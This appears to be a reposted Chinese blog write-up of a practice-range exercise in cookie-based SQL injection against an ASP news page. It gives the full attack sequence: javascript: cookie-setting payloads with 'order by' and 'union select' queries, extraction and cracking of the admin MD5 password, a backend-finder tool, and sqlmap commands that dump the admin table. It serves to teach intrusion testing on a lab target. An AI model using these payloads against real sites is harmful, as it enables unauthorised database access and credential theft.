第二次靶場練習:cookie注入


cookie注入

本文章目的是對相關的黑客內容進一步了解,如有人違反相關的法律法規,本人概不負責

一、學習目的:

  • 利用手工注入網站
  • 利用sqlmab注入

二、附件說明

  • 靶場網址:http://120.203.13.75:8001/shownews.asp
  • 工具sqlmap下載:https://download.csdn.net/download/qq_41803637/10911556
  • sqlmap使用說明:https://www.cnblogs.com/ichunqiu/p/5805108.html

三、手工注入

1、判斷有無注入點

代碼1

http://120.203.13.75:8001/shownews.asp?id=171 and 1=1

實踐1

說明:無法判斷是否可以使用sql注入,改為使用cookie注入【當然你也可以頭鐵的繼續試SQL注入】

隨機點開一個頁面,可以查看到,該頁面的id為171

返回到主頁

http://120.203.13.75:8001/shownews.asp

效果顯示

說明:頁面訪問不正常,則說明該參數id是訪問頁面所必需的的參數,可以嘗試繼續注入。

添加代碼2

javascript:alert(document.cookie="id="+escape("171"));

實踐2

注意這里默認會被屏蔽掉:javascript:,自己打一下

 

回車顯示

返回刷新原來的網頁

  • 說明:發現頁面正常顯示了,到此可以證明,我們正在接受的頁面存在request方法獲取參數,可能存在cookie注入的風險

2、猜測注入點的數量(判斷字段數的數量)

  • 代碼
關鍵詞:order by 注入點數量
javascript:alert(document.cookie="id="+escape("171 order by 1"));
說明:
"order by 1"表示注入點的數量,可以從100開始每一次減半減半的猜
  • 實踐.

 

  • 說明:回車刷新原網頁(http://120.203.13.75:8001/shownews.asp),說明注入點判斷錯誤,注入點不為11

 

  • 說明:回車刷新原網頁(http://120.203.13.75:8001/shownews.asp),說明注入點判斷成功,注入點不為10

3、猜測數據表

  • 代碼:此處我們猜測存在admin數據表:【這一步,目前只知道如果為手工,只能自己猜測數據表,不能如sql注入一樣爆出來,以后如果知道則補上】
javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"));

說明:
  • 前面測出有幾個注入點,就在select后面輸入從1到n的幾個數
  • admin為我們猜測的表
  • 實踐:

  • 說明:回車刷新原網頁,知道了會顯示字段為2,3,7,8,9

4、根據表和列得到具體值

  • 代碼
javascript:alert(document.cookie="id="+escape("171 union select 1,password,username,4,5,6,7,8,9,10 from admin"));

//這里的字段需要自己判斷
  • 實踐

  • 說明:用戶名:admin,密碼的MD5碼:b9a2a2b5dffb918c

5、MD5碼轉變為明碼

  • 網址:https://www.cmd5.com/
  • 結果:

  • 說明:密碼:welcome
6、查找后台
  • 軟件:御劍
  • 軟件下載地址:https://download.csdn.net/download/qq_41803637/10911612
  • 結果
  • 說明:后台網址為:http://120.203.13.75:8001/admin/login.asp

四、sqlmap注入

1、cookie注入,猜解表

win : python sqlmap.py -u "http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --table --level 2

2、猜解字段,(通過1的表猜解字段,假如表為admin)

win :python sqlmap.py -u "http://120.203.13.75:8001/shownews.asp" --cookie "id=171" --columns -T admin --level 2

3、猜解內容

win :python sqlmap.py -u "http://120.203.13.75:8001/shownews.asp" --cookie "id=17" --dump -T admin -C "username,password" --level 2


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM